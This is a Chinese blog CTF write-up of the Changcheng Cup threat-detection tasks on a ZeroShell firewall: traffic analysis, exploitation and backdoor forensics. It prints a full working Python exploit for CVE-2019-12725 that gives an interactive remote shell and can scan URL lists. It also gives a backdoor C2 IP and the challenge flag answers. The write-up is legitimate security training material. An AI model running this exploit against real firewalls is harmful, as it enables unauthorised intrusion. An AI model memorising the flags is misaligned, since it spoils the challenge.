长城杯-铁人三项-WP

最新推荐文章于 2025-05-17 16:11:09 发布
最新推荐文章于 2025-05-17 16:11:09 发布
阅读量997 收藏 19
点赞数 14
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zong02023/article/details/144647451
版权

一、威胁检测与网络流量分析

1.1zeroshell01

        解法一:查看数据包

        过滤http协议

        追踪http流量,发现base64编码

        ZmxhZ3s2QzJFMzhEQS1EOEU0LThEODQtNEE0Ri1FMkFCRDA3QTFGM0F9

        base64解码得到flag

        flag{6C2E38DA-D8E4-8D84-4A4F-E2ABD07A1F3A}

        也可以直接搜索flag的base64编码前几位zmxh,也可以搜到flag

        解法二:使用流量分析工具CTF-NetA

        将流量包拖入工具,可以直接找到base64编码的flag

1.2zeroshell02

        根据提示部署防火墙,访问ip后得到如下界面

        这也没有密码啊,根据题目要求漏洞利用获取权限(让自己编写exp或数据包重放),先尝试了数据包重放,没成功,于是想到在网上找一找这个防火墙zeroshell的漏洞,发现很多,随便用一个,这里利用CVE-2019-12725漏洞ZeroShell 命令注入漏洞复现及流量分析(CVE-2019-12725) - Gryffinbit的思维殿堂

        exp为:

import requests
import re
import sys
import urllib3
from argparse import ArgumentParser
import threadpool
from urllib import parse
from time import time
import random


urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
filename = sys.argv[1]
url_list=[]

#随机ua
def get_ua():
	first_num = random.randint(55, 62)
	third_num = random.randint(0, 3200)
	fourth_num = random.randint(0, 140)
	os_type = [
		'(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)',
		'(Macintosh; Intel Mac OS X 10_12_6)'
	]
	chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)

	ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
				   '(KHTML, like Gecko)', chrome_version, 'Safari/537.36']
				  )
	return ua


def check_vuln(url):
	url = parse.urlparse(url)
	url2=url.scheme + '://' + url.netloc 
	headers = {
		'User-Agent': get_ua(),
	}
	# data=base64.b64encode("eyJzZXQtcHJvcGVydHkiOnsicmVxdWVzdERpc3BhdGNoZXIucmVxdWVzdFBhcnNlcnMuZW5hYmxlUmVtb3RlU3RyZWFtaW5nIjp0cnVlfX0=")
	try:
		res2 = requests.get(url2 + '/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Aid%0A%27',headers=headers,timeout=10,verify=False)
		if res2.status_code==200 and "uid" in res2.text:
			print("\033[32m[+]%s is vuln\033[0m" %url2)
			return 1
		else:
			print("\033[31m[-]%s is not vuln\033[0m" %url1)
	except Exception as e:
		print("\033[31m[-]%s is timeout\033[0m" %url2)


#cmdshell
def cmdshell(url):
	if check_vuln(url)==1:
		url = parse.urlparse(url)
		url1 = url.scheme + '://' + url.netloc + '/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A'
		while 1:
			shell = input("\033[35mcmd: \033[0m")
			if shell =="exit":
				sys.exit(0)
			else:
				headers = {
					'User-Agent': get_ua(),
					}
				try:
					res = requests.get(url1 + shell + '%0A%27',headers=headers,timeout=10,verify=False)
					if res.status_code==200 and len(res.text) != 0:
						vulntext=res.text.split('<html>')
						print("\033[32m%s\033[0m" %vulntext[0])
					else:
						print("\033[31m[-]%s Command execution failed !\033[0m" %url1)
				except Exception as e:
					print("\033[31m[-]%s is timeout!\033[0m" %url1)


#多线程
def multithreading(url_list, pools=5):
	works = []
	for i in url_list:
		# works.append((func_params, None))
		works.append(i)
	# print(works)
	pool = threadpool.ThreadPool(pools)
	reqs = threadpool.makeRequests(check_vuln, works)
	[pool.putRequest(req) for req in reqs]
	pool.wait()


if __name__ == '__main__':
	show = r'''

	 _____ _   _ _____       _____  _____  __   _____        __   _____  ___________  _____ 
	/  __ \ | | |  ___|     / __  \|  _  |/  | |  _  |      /  | / __  \|___  / __  \|  ___|
	| /  \/ | | | |__ ______`' / /'| |/' |`| | | |_| |______`| | `' / /'   / /`' / /'|___ \ 
	| |   | | | |  __|______| / /  |  /| | | | \____ |______|| |   / /    / /   / /      \ \
	| \__/\ \_/ / |___      ./ /___\ |_/ /_| |_.___/ /      _| |_./ /___./ /  ./ /___/\__/ /
	 \____/\___/\____/      \_____/ \___/ \___/\____/       \___/\_____/\_/   \_____/\____/ 
                                                                                        
                                                                                                                                                                                                                  
                                                                                                      
                              		                     CVE-2019-12725 By m2
	'''
	print(show + '\n')
	arg=ArgumentParser(description='CVE-2019-12725 By m2')
	arg.add_argument("-u",
						"--url",
						help="Target URL; Example:http://ip:port")
	arg.add_argument("-f",
						"--file",
						help="Target URL; Example:url.txt")
	arg.add_argument("-c",
					"--cmd",
					help="Target URL; Example:http://ip:port")
	args=arg.parse_args()
	url=args.url
	filename=args.file
	cmd=args.cmd
	print('[*]任务开始...')
	if url != None and cmd == None and filename == None:
		check_vuln(url)
	elif url == None and cmd == None and filename != None:
		start=time()
		for i in open(filename):
			i=i.replace('\n','')
			check_vuln(i)
		end=time()
		print('任务完成,用时%d' %(end-start))
	elif url == None and cmd != None and filename == None:
		cmdshell(cmd)

        在cmd中运行该exp,拿到了防火墙的cmd

        下一步就是使用命令直接找flag文件

find / -type f -name "*flag*"

        直接读取一下第一个flag文件

        得到flag

        flag{c6045425-6e6e-41d0-be09-95682a4f65c4}

1.3zeroshell03

        让找驻留木马的外联域名或IP地址

        先找找木马文件,这里用磁盘挂在工具DiskGenius对防火墙磁盘进行挂载

        把.nginx文件导出来,放到病毒分析工具中去,这里使用微步在线云沙箱对文件进行分析

        找到了他的后门文件

        在下面的静态分析字符串中找到了一个IP地址,flag即为此IP

        202.115.89.103

1.4zeroshell04

        让写出木马进程执行的本体文件的名称

        本体文件就是.nginx

        flag{.nginx}

zeest.
关注
第一届长城杯信息安全铁人三项(四场)部分题目wp
weixin_67961126的博客
04-02 1921
首先看到流量分析的题目用wireshark,再导出http对象列表在zip对象中发现了files.zip。然后尝试暴力破解没有得到密码想着去分析一下文件用到的winhex。根据题目描述的提示结合之前没用到的key,des解码得到flag。就想着是不是还有别的加密----就想到了去检查一下是不是伪加密。发现这么多==是base64隐写,跑脚本得到。得到了key的值是66666666。是伪加密,改09为00。
网安竞第一期:长城杯信息安全铁人三项
shuzhong_的博客
10-01 1908
长城杯信安铁人三项
2024长城杯威胁检测与网络流量分析
2302_81785888的博客
12-17 567
追踪流,解码ZmxhZ3s2QzJFMzhEQS1EOEU0LThEODQtNEE0Ri1FMkFCRDA3QTFGM0F9得到flag{6C2E38DA-D8E4-8D84-4A4F-E2ABD07A1F3A}他告诉了写出会话中设置的flag,那就是流量里有flag的标示或者有被加密后flag标识。找到flag{c6045425-6e6e-41d0-be09-95682a4f65c4}通过数据包搜索分组字节流,找flag没找到,找flag的base64编码,找到流量。
第四届“长城杯信息安全铁人三项 Junk&&language
Todog的博客
03-24 1191
xxx
2024-CISCN-长城杯铁人三项
Aluxian_的博客
12-16 1121
【代码】2024-CISCN-长城杯铁人三项
第二届“长城杯信息安全铁人三项“crypto部分解题wp
符啸九天的博客
12-16 1638
长城杯crypto的fffffhash和rasnd的解题思路
2024长城杯铁人三项, Python代码分析题crypto WP
xingmiao0的博客
04-02 1222
temp = (x * flag中的每个字符的十进制ascii码值 + y) % 251。
第二届“长城杯信息安全铁人三项部分wp
jnszstmei的博客
12-17 1157
重点在这,我们一看到使用了flask框架,首先肯定是要验证是否存在ssti漏洞了,我们可以看到这里过滤了很多ssti有关的函数,更进一步验证了我们的猜想,我们使用最常见的措施payload,如下所示。发现不是这样利用的,tips.php也读不到,我们尝试换一种路径穿越的读法,经过搜索可以知道我们可以用.和/进行组合进行路径穿越,最后在fuzz测试下,我们发现…一开始执行的时候我们会出现ok,但是我们刷新几次,或者将浏览器倒退,就可以发现flag,发现的很巧合,原本以为这样构造payload不行。
2024 Ciscn长城杯铁人三项 逆向题Cython
qq_36791177的博客
12-19 1658
关键点位于ez.encrypt()和ez.check() ,而这两个函数存在于ez.cp311-win_amd64.pyd中,这也是本题的难点。,我们输入伪flag(长度24):012345678901234567890123,观察内存结构,可以找到下面关键点。接着分析,这里i+=0x54646454,所以说这是delta,后面汇总整个加密过程可以很明显发现。汇总一下可以得到,是不是感觉像一位故人(xtea加密),但是数值貌似不太对,别急继续往下分析。分析ez.check()函数可以得到加密后的数组。
第一届长城杯信息安全铁人三项 取证溯源 (复现)
m0_63138919的博客
09-14 1464
学习
长城杯信息安全铁人三项wp新人怎么学习线上比
11-09
长城杯信息安全铁人三项是一项针对信息安全爱好者的竞,对于新人来说,学习在线比通常涉及以下几个步骤: 1. **基础知识入门**:首先,了解基础的信息安全知识,包括网络安全、密码学、漏洞分析、操作系统安全...
【Linux网络】NAT和代理服务
最新发布
Sakura_ding的博客
05-17 481
正向代理(Forward Proxy)是一种常见的网络代理方式,它位于客户端和目标服务器之间,
转发多台px4仿真UDP数据到地面站
龙猫的博客
05-13 633
在上述代码中,UDP 在接收时是用不到此ip的,也就是 gcs_sock.bind(('', gcs_tx_port)),函数中的 ip 可以不填,只需要将端口号填对即可,但在发送时,需要指定 ip,而且在给飞控发送心跳时,需要绑定端口号为飞机的端口号。,因此,需要编写一个脚本在主机运行,接收 wsl 中仿真飞机的数据,通过主机的 ip 与端口发送给 app 的主机 ip 与端口(),并且,接收 app 的命令,转发给三台飞机(命令中会包含飞机id,因此脚本不需要做筛选,直接转发给三个即可)。
BGP联邦实验
xy021111的博客
05-13 497
1.AS1存在两个环回,一个地址为192.168.1.0/24,该地址不能再任何协议中宣告AS3存在两个环回,一个地址为192.168.2.0/24,该地址不能再任何协议中宣告AS1还有一个环回地址为10.1.1.0/24,AS3另一个环回地址是11.1.1.0/24最终要求这两个环回可以互相通讯。2.整个AS2的IP地址为172.16.0.0/163.AS间的骨干链路Ip地址随意分配4.使用BGP协议让整个网络所有设备的环回可以互相访问5.减少路由条目数量,避免环路出现。
HTTP协议
2401_85487314的博客
05-13 665
简介 工作原理 HTTP请求
计算机网络-MPLS VPN基础概念
Linux基础知识、计算机网络基础学习分享。
05-14 1135
前面几篇文章我们学习了MPLS的标签转发原理,有静态标签分发和LDP动态标签协议,可以实现LSR设备基于标签实现数据高效转发。现在开始学习MPLS在企业实际应用的场景-MPLS VPN。
nnUNet V2修改网络——暴力替换网络为UCTransNet
w1ndfly的博客
05-16 155
直接替换掉nnU-Net V2原有的U-Net,抛弃自适应网络设计,符合2d配置
计算机网络:怎么理解调制解调器的数字调制技术?
shunzi2016的博客
05-14 567
数字调制技术是将数字比特流转换为适合在物理信道传输的模拟信号的核心技术,通过改变载波的幅度、频率或相位来实现。其目标是高效利用频谱资源、提升抗干扰能力,并适应不同信道特性。主要调制方式包括幅移键控(ASK)、频移键控(FSK)、相移键控(PSK)和正交幅度调制(QAM),每种方式在频谱效率、抗噪声能力和应用场景上各有特点。高级调制技术如正交频分复用(OFDM)和扩频技术进一步提升了传输效率和抗干扰能力。实际应用中,Wi-Fi、4G LTE和5G NR等通信系统广泛采用这些技术,并根据信道质量动态调整调制方式
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值